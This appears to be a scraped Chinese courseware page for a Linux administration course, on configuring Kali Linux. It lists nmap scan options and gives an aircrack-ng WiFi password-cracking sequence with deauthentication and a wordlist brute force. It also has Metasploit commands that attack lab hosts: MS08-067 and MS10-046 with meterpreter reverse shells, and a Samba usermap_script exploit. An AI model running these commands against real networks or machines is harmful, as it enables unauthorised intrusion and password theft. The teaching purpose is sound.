《linux服務(wù)器配置與管理》課件15-任務(wù)十五 KALI操作系統(tǒng)的配置和使用_第1頁
《linux服務(wù)器配置與管理》課件15-任務(wù)十五 KALI操作系統(tǒng)的配置和使用_第2頁
《linux服務(wù)器配置與管理》課件15-任務(wù)十五 KALI操作系統(tǒng)的配置和使用_第3頁
《linux服務(wù)器配置與管理》課件15-任務(wù)十五 KALI操作系統(tǒng)的配置和使用_第4頁
《linux服務(wù)器配置與管理》課件15-任務(wù)十五 KALI操作系統(tǒng)的配置和使用_第5頁
已閱讀5頁,還剩29頁未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡(jiǎn)介

任務(wù)十五:KALI操作系統(tǒng)的配置和使用15.1任務(wù)資訊15.1.1任務(wù)描述某單位在網(wǎng)絡(luò)安全檢查中,需要使用KALI操作系統(tǒng),用于網(wǎng)絡(luò)安全檢測(cè)及調(diào)查取證。系統(tǒng)管理員在使用KALI過程中,需要使用安全漏洞檢測(cè)工具以及無線安全工具檢驗(yàn)密碼強(qiáng)度及系統(tǒng)的強(qiáng)壯性。

15.1.2任務(wù)目標(biāo)工作任務(wù)KALI服務(wù)器的安全工具使用學(xué)習(xí)目標(biāo)掌握KALI服務(wù)器的安全工具使用實(shí)踐技能1.學(xué)習(xí)NMAP安全工具2.學(xué)習(xí)aircrack安全工具破解wifi密碼3.學(xué)習(xí)安全漏洞檢測(cè)工具攻擊windowsXP攻擊windows20034.使用安全漏洞檢測(cè)工具攻擊LINUX靶機(jī)攻擊windows7知識(shí)要點(diǎn)1.學(xué)習(xí)NMAP安全工具2.學(xué)習(xí)aircrack安全工具破解wifi密碼3.學(xué)習(xí)安全漏洞檢測(cè)工具攻擊windowsXP、windows20034.使用安全漏洞檢測(cè)工具攻擊LINUX、windows715.2決策指導(dǎo)1.無線網(wǎng)絡(luò)檢測(cè)2.滲透測(cè)試軟件檢測(cè)操作系統(tǒng)安全15.3制定計(jì)劃KaliLinux預(yù)裝了許多滲透測(cè)試軟件,包括nmap、Wireshark、JohntheRipper,以及Aircrack-ng等。01-InformationGathering(信息收集)02-VulnerabilityAssessment(弱點(diǎn)評(píng)估)03-WebApplicationAnalysis(Web應(yīng)用程序分析)04-DatabaseAssessment(數(shù)據(jù)庫評(píng)估)05-PasswordAttacks(密碼攻擊)06-WirelessAttacks(無線攻擊)07-ReverseEngineering(逆向工程)08-ExploitationTools(滲透工具)09-Sniffing&Spoofing(嗅探和欺騙)10-PostExploitation(滲透以后)11-Forensics(取證工具)12-ReportingTools(報(bào)告工具)13-SocialEngineeringTools(社會(huì)工程工具)14-SystemServices(系統(tǒng)服務(wù))Usualapplications(常用應(yīng)用)15.4任務(wù)實(shí)施15.4.1學(xué)習(xí)NMAP安全工具1.在Kali系統(tǒng)上可以開啟SSH服務(wù)2.字典生成軟件crunch3.NMAP工具軟件Nmap常用

參數(shù)參

數(shù)說

明-sPping掃描,Nmap在掃描端口時(shí),默認(rèn)都會(huì)使用ping掃描-sL簡(jiǎn)單列表掃描-sn使用PING主機(jī)方式-sV監(jiān)測(cè)端口服務(wù)版本操作系統(tǒng)信息主機(jī)名等-sS半開掃描-sTTCP方式掃描,會(huì)在目標(biāo)主機(jī)的日志中記錄大批連接請(qǐng)求和錯(cuò)誤信息。-sUUDP掃描,UDP掃描是不可靠的-sA這項(xiàng)高級(jí)的掃描方法通常用來穿過防火墻的規(guī)則集-sF-sN秘密FIN數(shù)據(jù)包掃描、XmasTree、Null掃描模式-sC腳本掃描-A全面系統(tǒng)檢測(cè)、啟用腳本檢測(cè)、掃描等-O啟用遠(yuǎn)程操作系統(tǒng)檢測(cè),但可能存在誤報(bào)-V-v-v顯示掃描過程,推薦使用-PN掃描之前不使用ping命令-p指定端口,如“1-65535、1433、135、22、80、3389”等-h幫助文檔-T4針對(duì)TCP端口禁止動(dòng)態(tài)掃描延遲超過10ms設(shè)置時(shí)間模板-iL讀取主機(jī)列表,“-iLD:\iplist.txt”-oN-oX-oG將報(bào)告寫入文件,分別是正常、XML、grepable三種格式-traceroute路由跟蹤掃描--script按照腳本分類進(jìn)行掃描-6開啟IPv6掃描舉例(1)掃描指定IP所開放的端口:nmap-sS-p1-65535-v舉例(2)掃描C段存活主機(jī):nmap-sP/24舉例(3)指定端口掃描:nmap-p80,1433,22,1521舉例(4)探測(cè)主機(jī)操作系統(tǒng):nmap-o舉例(5)全面的系統(tǒng)探測(cè):nmap-v-A(nmap默認(rèn)掃描主機(jī)1000個(gè)高危端口)舉例(6)探測(cè)指定網(wǎng)段:nmap-10舉例(7)穿透防火墻進(jìn)行掃描:nmap-Pn-A(禁止用ping的)舉例(8)使用腳本,掃描Web敏感目錄:nmap-p80--script=http-enum.nse15.4.2學(xué)習(xí)aircrack安全工具破解wifi密碼1.需要環(huán)境2.所需要命令(1)airmon-ng #命令檢查網(wǎng)卡是否支持監(jiān)聽模式,使用airmon-ngcheckkill命令關(guān)閉無關(guān)進(jìn)程(2)airmon-ngstartwlan0 #開啟無線網(wǎng)卡的監(jiān)聽模式,使用iwconfig命令確認(rèn)網(wǎng)卡為監(jiān)聽模式(3)airodump-ngwlan0mon #搜索周圍的WiFi網(wǎng)絡(luò)(4)airodump-ng-c10--bssid00:27:19:4C:3F:6C-w90AB.capwlan0mon #抓取無線數(shù)據(jù)包(5)aireplay-ng-020-a00:27:19:4C:3F:6C-c7C:B2:32:1F:A9:0Ewlan0mon #攻擊已連接設(shè)備airodump-ng-c1--bssid00:27:19:6F:26:04-w2604wlan0monaireplay-ng-05-a00:27:19:6F:26:04-cA8:88:08:3f:AE:11wlan0mon(6)airmon-ngstopwlan0mon #停止抓包結(jié)束無線網(wǎng)卡的監(jiān)聽模式(7)aircrack-ng-a2-b00:27:19:4C:3F:6C-w/usr/share/wordlist/rockyou.txt3F6C.cap #暴力破解指定文件包aircrack-ng-a2-b00:27:19:6F:26:04-wdie.txt2604其他可能用到的命令:ifconfig、iwconfig、airmon-ngcheckkill。暴力破解步驟開啟網(wǎng)關(guān)監(jiān)聽模式確認(rèn)網(wǎng)卡模式、掃描WIFI熱點(diǎn)抓取握手包、強(qiáng)制設(shè)備重連抓取到握手包、結(jié)束監(jiān)聽模式獲得WIFI密碼15.4.3學(xué)習(xí)安全漏洞檢測(cè)工具攻擊windowsXP1.Metasploit工具M(jìn)etasploit工具一般攻擊的過程:(1)獲得EIP指令寄存器。(2)插入shellcode代碼或填充數(shù)據(jù)獲取權(quán)限。(3)反向連接shell。即將目標(biāo)主機(jī)當(dāng)做服務(wù),攻擊者機(jī)器作為客戶端。(4)添加用戶或進(jìn)行其它操作。首先利用掃描器的插件探測(cè)目標(biāo)系統(tǒng)的安全漏洞查找適用模塊選擇08-067模塊配置模塊、滲透成功執(zhí)行命令:ps查看目標(biāo)主機(jī)進(jìn)程從控制端添加用戶hack3.滲透實(shí)操:攻擊windows2003useexploit/Windows/smb/ms08_067_netapisetpayloadwindows/meterpreter/reverse_tcpsetRHOST38setLHOST37settarget3配置參數(shù)、成功獲取session通過遠(yuǎn)程桌面登錄4.滲透實(shí)操:攻擊linux靶機(jī)命令列表searchsambauseexploit/multi/samba/usermap_scriptShowpayloadsSetpayloadcmd/unix/bind_netcatShowoptionssetRHOST07exploit查找攻擊Samba的模塊選擇模塊、設(shè)定攻擊載荷5.滲透實(shí)操:通過10-046漏洞攻擊windows7對(duì)Windows7的掃描結(jié)果漏洞選擇查看參數(shù)、配置監(jiān)聽地址攻擊載荷配置、開始攻擊打開會(huì)話本小節(jié)用到的命令useexploit/windows/browser/ms10_046_shortcut_icon_dllloadersetpayloadwindows/meterpreter/reverse_tcpsetSRVHOST37setRHOST36setLHOST37評(píng)價(jià)指標(biāo)及評(píng)價(jià)內(nèi)容★★★★★★評(píng)價(jià)方式基本操作20分部署KALI操作系統(tǒng)

教師評(píng)價(jià)開啟SSH學(xué)習(xí)crunch密碼工具

動(dòng)手做20分(重現(xiàn))學(xué)習(xí)aircrack安全工具

自我評(píng)

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。

評(píng)論

0/150

提交評(píng)論